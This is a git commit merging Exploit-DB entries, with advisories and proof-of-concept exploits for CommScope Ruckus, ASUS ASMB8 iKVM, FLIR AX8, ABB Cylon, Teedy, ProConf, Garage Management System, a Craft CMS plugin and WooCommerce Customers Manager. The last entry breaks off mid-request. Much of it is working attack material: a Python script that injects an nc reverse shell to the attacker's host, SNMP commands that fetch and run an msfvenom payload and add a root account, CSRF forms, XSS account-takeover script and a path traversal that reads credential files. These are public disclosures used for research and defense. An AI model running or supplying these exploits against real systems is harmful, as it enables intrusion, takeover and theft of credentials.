Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-04-18 00:01:14 +00:00
commit 682b78fb31
24 changed files with 1845 additions and 1 deletions

View file

@ -0,0 +1,110 @@
# Exploit Title: CommScope Ruckus IoT Controller 1.7.1.0 - Undocumented Account
# Date: 2021.05.26
# Exploit Author: korelogic
# Vendor Homepage: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
# Affected Product: Ruckus IoT Controller
# Version: 1.7.1.0 and earlier
# Tested on: Linux
# CVE : CVE-2021-33216,CVE-2019-1000018
KL-001-2021-007: CommScope Ruckus IoT Controller Undocumented Account
Advisory ID: KL-001-2021-007
Publication Date: 2021.05.26
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-007.txt
1. Vulnerability Details
Affected Vendor: CommScope
Affected Product: Ruckus IoT Controller
Affected Version: 1.7.1.0 and earlier
Platform: Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-912: Hidden Functionality
CVE ID: CVE-2021-33216
2. Vulnerability Description
An upgrade account is included in the IoT Controller OVA that
provides the vendor undocumented access via Secure Copy (SCP).
3. Technical Description
Once the OVA is imported into VirtualBox, a VMDK file is
created. The VMDK file can be mounted and the directory
structure and its contents can be perused.
An authorized_keys file exists that allows an
individual/organization possessing the SSH private key to
access the virtual appliance using the 'vriotiotupgrade'
account. The 'vriotiotupgrade' account is restricted to scp,
per the rssh configuration.
Additionally, it appears that the IoT Controller has rssh version 2.3.4
installed and in use. At the time of this advisory, there are at least
three remote command injection vulnerabilities in this particular version
of rssh: CVE-2019-3463, CVE-2019-3464 and CVE-2019-1000018.
4. Mitigation and Remediation Recommendation
The vendor has released an updated firmware (1.8.0.0) which
remediates the described vulnerability. Firmware and release
notes are available at:
https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
5. Credit
This vulnerability was discovered by Jim Becher (@jimbecher)
of KoreLogic, Inc.
6. Disclosure Timeline
2021.03.30 - KoreLogic submits vulnerability details to
CommScope.
2021.03.30 - CommScope acknowledges receipt and the intention
to investigate.
2021.04.06 - CommScope notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline.
2021.04.06 - KoreLogic agrees to extend disclosure embargo if
necessary.
2021.04.30 - CommScope informs KoreLogic that remediation for
this vulnerability will be available inside of the
standard 45 business day timeline. Requests
KoreLogic acquire CVE number for this
vulnerability.
2021.05.14 - 30 business days have elapsed since the
vulnerability was reported to CommScope.
2021.05.17 - CommScope notifies KoreLogic that the patched
version of the firmware will be available the week
of 2021.05.24.
2021.05.19 - KoreLogic requests CVE from MITRE.
2021.05.19 - MITRE issues CVE-2021-33216.
2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
advisory.
2021.05.26 - KoreLogic public disclosure.
7. Proof of Concept
With the VMDK file mounted at the current working directory:
$ find . -name authorized_keys
./VRIOT/ap-images/authorized_keys
./VRIOT/ops/ap-images/authorized_keys
$ cat VRIOT/ap-images/authorized_keys
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
chandini.venkatesh@commscope.com
$ cat VRIOT/ops/ap-images/authorized_keys
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==
chandini.venkatesh@commscope.com
$ grep "ap-images" etc/passwd
vriotiotupgrade:x:1002:1002::/VRIOT/ap-images/:/usr/bin/rssh
$ tail -8 etc/ssh/sshd_config
Match User vriotiotupgrade
PasswordAuthentication no
AuthorizedKeysFile /VRIOT/ap-images/authorized_keys
Match User vriotha
PasswordAuthentication yes
$ grep -v ^# etc/rssh.conf
logfacility = LOG_USER
allowscp
umask = 022
The contents of this advisory are copyright(c) 2021
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

View file

@ -0,0 +1,61 @@
# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)
# Date: 2023-02-16
# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
# CVE: CVE-2023-26602
++++++++++++++++++++
0x00 DESCRIPTION
++++++++++++++++++++
During a recent engagement, a remote server management interface has been
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
access to the private community, subsequently allowing us to introduce
SNMP arbitrary extensions to achieve RCE.
We also found a hardcoded account sysadmin:superuser by cracking the
shadow file (md5crypt) found on the system and identifed an "anonymous"
user w/ the same password, however a lock seems to be in place to prevent
using these credentials via SSH (running defshell as default shell).
+++++++++++++++
0x01 IMPACT
+++++++++++++++
By exploiting SNMP arbitrary extension, we are able to run any command on
the system w/ root privileges, and we are able to introduce our own user
circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
At first, we have to create required extensions on the system, e.g. via
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
and if everything is set, we can just run that command by
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
The identified RCE can be used to transfer a reverse tcp shell created
by msfvenom for arm little-endian, e.g.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
We can now transfer the binary, adjust permissions and finally run it:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
Again, we have to request execution of the lines in the MIB via:
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
We get a reverse connection from the host, and can now act on the local system
to easily echo our own line into /etc/passwd:
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
By setting the standard shell to /bin/sh, we are able to get a SSH root
shell into the system, effectively circumventing the defshell restriction.
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
# uptime
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
# head -n 1 /etc/shadow
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
---
#EOF

171
exploits/hardware/remote/52246.py Executable file

File diff suppressed because one or more lines are too long

View file

@ -0,0 +1,82 @@
# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-37061
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
urllib3.disable_warnings()
def banner():
flirLogo = """
.---------------------.
/--'--.------.--------/|
|Say :) |__Ll__| [==] ||
|cheese!| .--. | '''' ||
| |( () )| ||
| | `--` | |/
`-------`------`------`
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
\033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(flirLogo))
def pingWebInterface(RHOST, RPORT):
url = 'http://{}:{}/login/'.format(RHOST, RPORT)
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
try:
if response.status_code != 200:
print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
version = soup.find('p', id='login-title').string
print('[INFO] {} detected.'.format(version))
except:
print('[ERROR] Can\'t grab the device version...')
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LHOST)
data = 'action=alarm&id=2;{}'.format(payload)
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
}
try:
print('[INFO] Executing reverse shell...')
response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
return
except Exception as e:
print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)
return False
def main():
banner()
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
args = parser.parse_args()
pingWebInterface(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
if __name__ == "__main__":
main()

View file

@ -0,0 +1,117 @@
<html>
<!--
ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5870
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
CVE ID: CVE-2024-48846
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
// Add User/Admin
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="zeroscience" />
<input type="hidden" name="PASSWORD" value="ZSL251" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Make me a prince! (php)" />
</form>
</body>
// Add User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="newuser" value="test" />
<input type="hidden" name="password" value="test123" />
<input type="hidden" name="passwordConfirm" value="test123" />
<input type="hidden" name="Insert" value="Add" />
<input type="submit" value="Make me a prince! (java)" />
</form>
</body>
// Delete User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="user9" value="test" />
<input type="hidden" name="remove9" value="1" />
<input type="hidden" name="totalRows" value="9" />
<input type="hidden" name="Delete" value="Delete" />
<input type="submit" value="Destr0y" />
</form>
</body>
</html>

View file

@ -0,0 +1,56 @@
# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
# Vendor Homepage: https://teedy.io/
# Software Link: https://github.com/Tomblib0/Teedy
# Version: 1.11
# Tested on: Linux
# CVE : CVE-2024-46278
There is a vulnerability that causes XSS when downloading files.
XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.
Login as an attackers account.
Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.
```
<script>
const currentCookie = document.cookie;
const requestOptions = {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'application/json, text/plain, */*',
'Cookie': currentCookie,
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
'sec-ch-ua-platform': '"Linux"',
'Origin': 'http://localhost:8080',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'http://localhost:8080/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9'
},
body: 'password=superSecure2&passwordconfirm=superSecure2'
};
fetch('http://localhost:8080/api/user', requestOptions)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok');
}
document.write('<h1>Your account was taken over by the attacker LOL</h1>');
return response.json();
})
.then(data => console.log(data))
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
```
Login with another account. eg. admin
Click on the file uploaded by the attacker and select Download this file.

View file

@ -0,0 +1,24 @@
# Exploit Title: ProConf 6.0 - Insecure Direct Object Reference (IDOR)
# Date: 19/07/2018
# Exploit Author: S. M. Zia Ur Rashid, SC
# Author Contact: https://www.linkedin.com/in/ziaurrashid/
# Vendor Homepage: http://proconf.org & http://myproconf.org
# Version: <= 6.0
# Tested on: Windows
# CVE : CVE-2018-16606
# Patched Version: 6.1
# Description:
In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows
any author to view and grab all submitted papers (Title and Abstract) and
their authors' personal information (Name, Email, Organization, and
Position) by changing the value of Paper ID (the pid parameter).
# PROOF-OF-CONCEPT
Step 1: Sign In as an author for a conference & submit a paper. Youall get
a paper ID.
Step 2: Now go to paper details and change the value of Paper ID (param
pid=xxxx) to nearest previous value to view others submitted paper &
authors information.
http:// <http:>
[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx

View file

@ -0,0 +1,37 @@
# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
# Date: 18-09-2022
# Exploit Author: Sam Wallace, SC
# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2022-41358
Summary:
Garage Management System utilizes client side validation to prevent XSS.
Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
POC:
POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"
<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"
1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"
------WebKitFormBoundaryqKDsN4gmatTEEkhS--

View file

@ -0,0 +1,137 @@
# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal
# Date: 2022.01.26
# Exploit Author: Steffen Rogge, SC
# Vendor Homepage: https://github.com/ethercreative/logs
# Software Link: https://plugins.craftcms.com/logs
# Version: <=3.0.3
# Tested on: Linux
# CVE : CVE-2022-23409
product: Ethercreative Logs plugin for Craft CMS
fixed version: >=3.0.4
impact: Medium
found: 2021-07-06
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"A quick and dirty way to access your logs from inside the CP"
As found on the plugin store page: https://plugins.craftcms.com/logs
Active Installs 4,093 (as of 2021-07-07)
Business recommendation:
------------------------
The vendor provides a patched version v3.0.4 which should be installed immediately.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Path Traversal (CVE-2022-23409)
The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
the backend of the CMS. As the requested logfile is not properly validated, an attacker is
able to request arbitrary files from the underlying file system with the permissions of the
web service user.
Proof of concept:
-----------------
1) Authenticated Path Traversal (CVE-2022-23409)
As the plugin is installed as an administrator of the system and the function is only accessible
after being logged in as an admin, an attacker needs to be authenticated as an administrator in
the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
The vulnerable endpoint is provided by the plugin under the following path:
https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
The vulnerable controller for that endpoint can be found here:
https://github.com/ethercreative/logs/blob/master/src/Controller.php
The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
values before file content is being read by the function "file_get_contents".
public function actionStream ()
{
$logsDir = \Craft::getAlias('@storage/logs');
$logFile = \Craft::$app->request->getParam('log');
$currentLog = \Craft::$app->request->get('log', $logFile);
$log = file_get_contents($logsDir . '/' . $currentLog);
exit($log);
}
A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
with rights as the user executing the web server. In most cases this will be the user "www-data".
In order to read the file ".env" or ".env.php" which contains the environment configuration and as
such also the database credentials, the following request can be used:
GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;
The response then discloses the file content of the file ".env":
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2021 10:08:52 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
Content-Length: 1600
Connection: close
[...]
$craftEnvVars = [
'DB_DRIVER' => 'mysql',
'DB_SERVER' => '********',
'DB_USER' => '********',
'DB_PASSWORD' => '********',
'DB_DATABASE' => '********',
'DB_SCHEMA' => 'public',
'DB_TABLE_PREFIX' => '',
'DB_PORT' => '********',
'SECURITY_KEY' => '********',
[...]
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available at the time
of the test:
* Version 3.0.3 released on November 25, 2019
Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
Vendor contact timeline:
------------------------
2021-07-07: Contacting vendor through dev@ethercreative.co.uk
2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
for any risks involved with plaintext communication
2021-07-08: Advisory was sent to vendor unencrypted
2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
2022-01-24: Release of security advisory
Solution:
---------
The vendor released a patched version 3.0.4 or higher which can be retrieved from their
website/github:
https://plugins.craftcms.com/logs
https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
Workaround:
-----------
Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Steffen Rogge / @2022

View file

@ -0,0 +1,91 @@
# Exploit Title: WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
# Date: 2024-03-25
# Exploit Author: Ivan Spiridonov - xbz0n
# Software Link: https://codecanyon.net/item/woocommerce-customers-manager/10965432
# Version: 29.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2024-0399
## SQL Injection
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.
## Affected Components
- **Plugin:** WooCommerce Customers Manager
- **Version:** 29.4
- **Affected Parameters:** 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
- **Affected Endpoint:** /wp-admin/admin-ajax.php
## Description
The vulnerability is located within the transaction amount parameters like 'max_amount', 'max_amount_total', 'min_amount', and 'min_amount_total' used in the admin AJAX endpoint. By injecting SQL commands into these parameters, authenticated attackers can manipulate SQL queries leading to a time-based SQL Injection vulnerability.
## Proof of Concept
### Manual Exploitation
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
Content-Length: 1877
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="action"
wccm_get_orders_tot_num
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="start_date"
2024-01-09
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="end_date"
2024-01-11
-----------------------------2461714219322283440478088295
